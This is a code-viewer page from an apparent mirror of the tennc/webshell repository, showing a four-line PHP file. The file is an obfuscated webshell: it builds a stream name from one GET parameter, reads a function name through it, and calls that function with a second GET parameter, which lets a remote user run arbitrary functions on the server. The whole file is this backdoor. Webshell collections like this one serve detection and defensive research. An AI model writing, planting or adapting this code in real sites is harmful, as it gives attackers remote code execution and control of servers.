mirror of
https://github.com/tennc/webshell
synced 2024-11-25 12:40:17 +00:00
4 lines
58 B
PHP
4 lines
58 B
PHP
|
<?php
|
||
|
$q=$_GET[1];
|
||
|
file_get_contents("php".$q)($_GET[2]);
|